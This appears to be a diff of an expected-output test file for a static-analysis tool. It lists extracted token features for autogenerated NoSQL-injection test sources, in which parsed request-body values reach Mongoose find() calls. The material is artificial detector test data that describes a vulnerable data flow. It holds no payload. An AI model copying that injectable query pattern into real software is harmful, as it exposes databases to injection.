autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:30 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:30 | id | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:33 | id: v | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v | CalleeFlexibleAccessPath | getMongooseQuery().find | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v | InputAccessPathFromCallee | 0.id | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v | InputArgumentIndex | 0 | @@ -108,12 +702,205 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:33:23:33 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:0 | this | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:0 | this | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | dbClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | dbClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | dbClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | module | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | module | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | require | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:1:1:1 | require | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:12 | dbClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:12 | dbClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:12 | dbClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:12 | dbClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:45 | dbClien ... oClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:45 | dbClien ... oClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:45 | dbClien ... oClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:45 | dbClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:45 | dbClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:5:1:45 | dbClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:22 | require | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:22 | require | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:33 | exceptional return of require("mongodb") | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:33 | exceptional return of require("mongodb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:33 | exceptional return of require("mongodb") | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:33 | require("mongodb") | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:33 | require("mongodb") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:33 | require("mongodb") | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:45 | require ... oClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:45 | require ... oClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:16:1:45 | require ... oClient | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:24:1:32 | "mongodb" | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:24:1:32 | "mongodb" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:24:1:32 | "mongodb" | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:24:1:32 | "mongodb" | contextFunctionInterfaces | connect(fn)\ndb() | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:24:1:32 | "mongodb" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:24:1:32 | "mongodb" | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:35:1:45 | MongoClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:35:1:45 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:1:35:1:45 | MongoClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:4 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:4 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:4 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:4 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:11 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:11 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:11 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:11 | db = null | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:11 | db = null | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:3:2:11 | db = null | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:8:2:11 | null | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:8:2:11 | null | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:2:8:2:11 | null | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:3:6 | module | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:3:6 | module | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:3:14 | module.exports | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:3:14 | module.exports | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:13:1 | module. ... ;\\n }\\n} | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:13:1 | module. ... ;\\n }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:1:13:1 | module. ... ;\\n }\\n} | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:8:3:14 | exports | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:8:3:14 | exports | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:18:13:1 | {\\n db: ... ;\\n }\\n} | assignedToPropName | exports | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:18:13:1 | {\\n db: ... ;\\n }\\n} | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:18:13:1 | {\\n db: ... ;\\n }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:3:18:13:1 | {\\n db: ... ;\\n }\\n} | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:4:4 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:4:4 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:4:4 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:6:3 | db: () ... db;\\n } | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:6:3 | db: () ... db;\\n } | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:6:3 | db: () ... db;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:6:3 | db: () ... db;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:6:3 | db: () ... db;\\n } | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:3:6:3 | db: () ... db;\\n } | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:4:6 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:4:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:4:6 | db | enclosingFunctionBody | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:4:6 | db | enclosingFunctionName | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:4:6 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | 'arguments' object of method db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | 'arguments' object of method db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | 'arguments' object of method db | enclosingFunctionBody | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | 'arguments' object of method db | enclosingFunctionName | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | 'arguments' object of method db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | () => { ... db;\\n } | assignedToPropName | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | () => { ... db;\\n } | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | () => { ... db;\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | () => { ... db;\\n } | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | exceptional return of method db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | exceptional return of method db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | exceptional return of method db | enclosingFunctionBody | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | exceptional return of method db | enclosingFunctionName | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | exceptional return of method db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | return of method db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | return of method db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | return of method db | enclosingFunctionBody | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | return of method db | enclosingFunctionName | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:4:7:6:3 | return of method db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:5:12:5:13 | db | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:5:12:5:13 | db | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:5:12:5:13 | db | enclosingFunctionBody | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:5:12:5:13 | db | enclosingFunctionName | db | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:5:12:5:13 | db | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:7:9 | connect | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:7:9 | connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:7:9 | connect | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:12:3 | connect ... });\\n } | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:12:3 | connect ... });\\n } | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:12:3 | connect ... });\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:12:3 | connect ... });\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:12:3 | connect ... });\\n } | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:3:12:3 | connect ... });\\n } | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:11 | dbClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:11 | dbClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:11 | dbClient | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:11 | dbClient | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:11 | dbClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:12 | fn | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:12 | fn | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:12 | fn | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:12 | fn | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:12 | fn | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:7:13 | fn | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | 'arguments' object of method connect | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | 'arguments' object of method connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | 'arguments' object of method connect | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | 'arguments' object of method connect | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | 'arguments' object of method connect | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | exceptional return of method connect | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | exceptional return of method connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | exceptional return of method connect | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | exceptional return of method connect | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | exceptional return of method connect | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | fn => { ... });\\n } | assignedToPropName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | fn => { ... });\\n } | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | fn => { ... });\\n } | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | fn => { ... });\\n } | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | return of method connect | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | return of method connect | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | return of method connect | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | return of method connect | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:7:12:12:3 | return of method connect | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:12 | dbClient | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:12 | dbClient | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:12 | dbClient | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:12 | dbClient | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:12 | dbClient | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:20 | dbClient.connect | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:20 | dbClient.connect | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:20 | dbClient.connect | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:20 | dbClient.connect | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:8:20 | dbClient.connect | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | dbClien ... \\n }) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | dbClien ... \\n }) | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | dbClien ... \\n }) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | dbClien ... \\n }) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | dbClien ... \\n }) | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | exceptional return of dbClien ... \\n }) | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | exceptional return of dbClien ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | exceptional return of dbClien ... \\n }) | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | exceptional return of dbClien ... \\n }) | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:5:11:6 | exceptional return of dbClien ... \\n }) | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:14:8:20 | connect | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:14:8:20 | connect | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:14:8:20 | connect | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:14:8:20 | connect | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:14:8:20 | connect | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:28 | process | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:28 | process | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:28 | process | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:28 | process | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:28 | process | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:32 | process.env | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:32 | process.env | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:32 | process.env | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:32 | process.env | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:32 | process.env | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:39 | process.env.DB_URL | CalleeFlexibleAccessPath | dbClient.connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:39 | process.env.DB_URL | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:39 | process.env.DB_URL | calleeImports | mongodb | @@ -123,6 +910,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:39 | process.env.DB_URL | enclosingFunctionName | connect | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:39 | process.env.DB_URL | fileImports | mongodb | | autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:22:8:39 | process.env.DB_URL | receiverName | dbClient | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:30:8:32 | env | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:30:8:32 | env | contextSurroundingFunctionParameters | (fn) | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:30:8:32 | env | enclosingFunctionBody | fn dbClient connect process env DB_URL err client db client db process env DB_NAME fn err | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:30:8:32 | env | enclosingFunctionName | connect | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:30:8:32 | env | fileImports | mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:34:8:39 | DB_URL | contextFunctionInterfaces | connect(fn)\ndb() | +| autogenerated/NosqlAndSqlInjection/untyped/dbo.js:8:34:8:39 | DB_URL | contextSurroundingFunctionParameters | 